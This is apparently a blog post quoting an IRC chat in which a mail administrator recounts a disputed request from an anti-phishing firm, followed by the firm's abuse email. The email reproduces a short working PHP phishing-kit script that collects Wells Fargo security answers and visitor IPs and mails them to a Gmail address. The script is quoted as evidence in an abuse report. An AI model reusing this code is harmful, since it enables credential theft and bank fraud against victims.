For anyone who has always wondered what posthamsters (no matter how many hats they wear) go through all day long:

19:45 < adaptr> I have a story
19:46 < adaptr> early this morning, I got a corporate email from some guy named “John” at phishlabs.com. yes, srsly.
19:47 < adaptr> in it, he told me he had uncovered a bank phishing site in which the phishing script contained a mail destination on one of our corporate domains. he asked me to disable the email account because, well, it wuz badd
19:48 < adaptr> he included about 25 lines of PHP with one recipient a gmail address, and another the same localpart at our domain
19:49 < adaptr> I mailed him back stating, simply, that A. I had no idea who he was, or where the PHP script came from, since he didn’t bother to tell me. Also, B. how am I supposed to control whatever email address ANYBODY puts ANYWHERE ?
19:50 < adaptr> I further divulged that this is a business domain without user mailboxes, and that address did not exist
19:50 < adaptr> which he could have ascertained himself within 5 seconds by SENDING A MAIL TO IT
19:50 < adaptr> which he didn’t
19:50 < adaptr> I thought: there, chew on that
19:50 < adaptr> a few hours later, HE CALLS ME
19:51 < adaptr> a real, live, direct, human phone call, from Maryland to .NL
19:51 < adaptr> he asked if I could help him by disabling that email address, becuz he wus ph33red of the bad phishermen
19:52 < adaptr> I had to explain to him, again, that A. this is not a mailbox, B. whatever email people send to our domains is none of his business, and C. if he has the PHP code, he can shut down the web site and the problem is over
19:53 < adaptr> he responded that he already had shut down the web site, but well, yada yada still ph33r and would I help him ?
19:53 < adaptr> I said if he wanted anything from our domain, he could produce papers, such as warrants or court orders, and we’d be happy to oblige
19:53 < adaptr> otherwise, nothing doing, noob
19:54 < adaptr> then came the kicker: remember that this was a business call, from “John” to me as a representative of the firm I work for
19:55 < adaptr> he had figured out by now that I was not going to indulge his fantasies, so he started off: what would YOUR FAMILY, who are surely also a victim of phishing, yada yada
19:55 < adaptr> I exploded at him
19:55 < adaptr> I said you are bringing personal matters into a business issue ? take your shit up with our legal department, if you have any, and gfy
19:55 < adaptr> he understood my tone and hung up
19:56 < adaptr> unbelievable
19:56 < adaptr> phishlabs.com
19:56 < cite> adaptr: May I blog that little story?
19:56 < adaptr> a one-person “security expert” site
19:56 < adaptr> with about 100 hits a day
19:56 < adaptr> cite: go wild
19:57 < cite> adaptr: Thanks. […]
19:57 < adaptr> cite: don’t forget to mention he claimed to be acting on behalf of Wells Fargo

And this was the email in question:

From: PhishLabs Security Operations [mailto:soc@phishlabs.com]
Sent: do 2010-02-18 04:04
To: support@*****; abuse@*****
CC: casetracker@phishlabs.com
Subject: [PL-****] Please suspend email address for phishing -

Hello,

Our company investigates computer crimes. 

 

We have determined that one of your customers' email accounts is being used to receive stolen data from a bank scam.
A fake bank web page (phishing) is set up and programmed to send victim bank info to housefly23@*******.

We are requesting that you suspend the email account housefly23@*******. 
Also, please send us any details of the user and the messages which may contain bank details.    

We will return this information to our customer, Wells Fargo bank.

 

Thank you,

John

 

Phish Site PHP Code

 

<?php
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
$question1 = $HTTP_POST_VARS["question1"];
$answer1 = $HTTP_POST_VARS["answer1"];
$question2 = $HTTP_POST_VARS["question2"];
$answer2 = $HTTP_POST_VARS["answer2"];
$question3 = $HTTP_POST_VARS["question3"];
$answer3 = $HTTP_POST_VARS["answer3"];
$mesaj = "Wellsfargo Result 3:
question1 : $question1
answer1 : $answer1
question2 : $question2
answer2 : $answer2
question3 : $question3
answer3 : $answer3
---------------Created By CADOTUNJI------------------------------
IP : $ip 
DATE : $datamasii
";

$recipient = "housefly23@gmail.com,housefly23@*******";
$subject = "Wellsfargo Result 3:";

mail($recipient,$subject,$mesaj);
header("Location: verify.php");
?>

Folks, be grateful when your mail simply arrives. You have no idea what others have to do to make that happen!